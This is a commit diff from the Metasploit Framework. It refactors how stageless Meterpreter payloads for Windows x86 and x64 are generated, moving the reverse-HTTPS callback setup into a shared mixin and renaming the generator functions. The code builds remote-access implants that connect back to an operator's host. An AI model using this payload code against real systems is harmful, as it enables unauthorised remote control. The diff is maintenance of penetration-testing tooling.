Refactor of code to reduce duplication
Add mixin for the stageless http preparationbug/bundler_fix
OJ
parent
f8851551c5
commit
26792975eb
|
|
@ -0,0 +1,73 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/parser/x509_certificate'
|
||||
|
||||
module Msf
|
||||
|
||||
##
|
||||
#
|
||||
# Helper functionality for handling of stageless http(s) payloads
|
||||
#
|
||||
##
|
||||
|
||||
module Handler::ReverseHttp::Stageless
|
||||
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
|
||||
def initialize_stageless
|
||||
register_options([
|
||||
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def generate_stageless(&block)
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
unless block_given?
|
||||
raise ArgumentError, "Stageless generation requires a block argument"
|
||||
end
|
||||
|
||||
# invoke the given function to generate the architecture specific payload
|
||||
block.call(url) do |dll|
|
||||
|
||||
# TODO: figure out this bit
|
||||
# patch the target ID into the URI if specified
|
||||
#if opts[:target_id]
|
||||
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
# if i
|
||||
# t = opts[:target_id].to_s
|
||||
# raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
# print_status("Patching Target ID #{t} into DLL")
|
||||
# dll[i, u.length] = u
|
||||
# end
|
||||
#end
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
|
||||
:url => url,
|
||||
:ssl => true,
|
||||
:ssl_cert_hash => verify_cert_hash,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ua => datastore['MeterpreterUserAgent'],
|
||||
:proxyhost => datastore['PROXYHOST'],
|
||||
:proxyport => datastore['PROXYPORT'],
|
||||
:proxy_type => datastore['PROXY_TYPE'],
|
||||
:proxy_username => datastore['PROXY_USERNAME'],
|
||||
:proxy_password => datastore['PROXY_PASSWORD'])
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -51,7 +51,7 @@ module Payload::Windows::StagelessMeterpreter
|
|||
asm
|
||||
end
|
||||
|
||||
def generate_stageless_meterpreter(url = nil)
|
||||
def generate_stageless_x86(url = nil)
|
||||
dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll'))
|
||||
|
||||
conf = {
|
||||
|
|
|
|||
|
|
@ -51,7 +51,7 @@ module Payload::Windows::StagelessMeterpreter_x64
|
|||
asm
|
||||
end
|
||||
|
||||
def generate_stageless_meterpreter(url = nil)
|
||||
def generate_stageless_x64(url = nil)
|
||||
dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x64.dll'))
|
||||
|
||||
conf = {
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ module Metasploit3
|
|||
def generate
|
||||
# blank LHOST indicates bind payload
|
||||
url = "tcp://:#{datastore['LPORT']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x86(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -5,18 +5,18 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/core/handler/reverse_http/stageless'
|
||||
require 'msf/core/payload/windows/stageless_meterpreter'
|
||||
require 'msf/base/sessions/meterpreter_x86_win'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/parser/x509_certificate'
|
||||
|
||||
module Metasploit3
|
||||
module Metasploit4
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Windows::StagelessMeterpreter
|
||||
include Msf::Handler::ReverseHttp::Stageless
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
|
|
@ -31,48 +31,13 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::Meterpreter_x86_Win
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
|
||||
], self.class)
|
||||
initialize_stageless
|
||||
end
|
||||
|
||||
def generate
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
generate_stageless_meterpreter(url) do |dll|
|
||||
|
||||
# TODO: figure out this bit
|
||||
# patch the target ID into the URI if specified
|
||||
#if opts[:target_id]
|
||||
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
# if i
|
||||
# t = opts[:target_id].to_s
|
||||
# raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
# print_status("Patching Target ID #{t} into DLL")
|
||||
# dll[i, u.length] = u
|
||||
# end
|
||||
#end
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
|
||||
:url => url,
|
||||
:ssl => true,
|
||||
:ssl_cert_hash => verify_cert_hash,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ua => datastore['MeterpreterUserAgent'],
|
||||
:proxyhost => datastore['PROXYHOST'],
|
||||
:proxyport => datastore['PROXYPORT'],
|
||||
:proxy_type => datastore['PROXY_TYPE'],
|
||||
:proxy_username => datastore['PROXY_USERNAME'],
|
||||
:proxy_password => datastore['PROXY_PASSWORD'])
|
||||
end
|
||||
|
||||
# generate a stageless payload using the x86 version of
|
||||
# the stageless generator
|
||||
generate_stageless(&method(:generate_stageless_x86))
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ module Metasploit3
|
|||
|
||||
def generate
|
||||
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x86(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -36,7 +36,7 @@ module Metasploit3
|
|||
|
||||
def generate
|
||||
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x86(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -5,18 +5,18 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/core/handler/reverse_http/stageless'
|
||||
require 'msf/core/payload/windows/x64/stageless_meterpreter'
|
||||
require 'msf/base/sessions/meterpreter_x64_win'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/parser/x509_certificate'
|
||||
|
||||
module Metasploit3
|
||||
module Metasploit4
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Windows::StagelessMeterpreter_x64
|
||||
include Msf::Handler::ReverseHttp::Stageless
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
|
|
@ -31,48 +31,13 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::Meterpreter_x64_Win
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
|
||||
], self.class)
|
||||
initialize_stageless
|
||||
end
|
||||
|
||||
def generate
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
generate_stageless_meterpreter(url) do |dll|
|
||||
|
||||
# TODO: figure out this bit
|
||||
# patch the target ID into the URI if specified
|
||||
#if opts[:target_id]
|
||||
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
# if i
|
||||
# t = opts[:target_id].to_s
|
||||
# raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
# print_status("Patching Target ID #{t} into DLL")
|
||||
# dll[i, u.length] = u
|
||||
# end
|
||||
#end
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
|
||||
:url => url,
|
||||
:ssl => true,
|
||||
:ssl_cert_hash => verify_cert_hash,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ua => datastore['MeterpreterUserAgent'],
|
||||
:proxyhost => datastore['PROXYHOST'],
|
||||
:proxyport => datastore['PROXYPORT'],
|
||||
:proxy_type => datastore['PROXY_TYPE'],
|
||||
:proxy_username => datastore['PROXY_USERNAME'],
|
||||
:proxy_password => datastore['PROXY_PASSWORD'])
|
||||
end
|
||||
|
||||
# generate a stageless payload using the x64 version of
|
||||
# the stageless generator
|
||||
generate_stageless(&method(:generate_stageless_x64))
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ module Metasploit4
|
|||
|
||||
def generate
|
||||
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x64(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue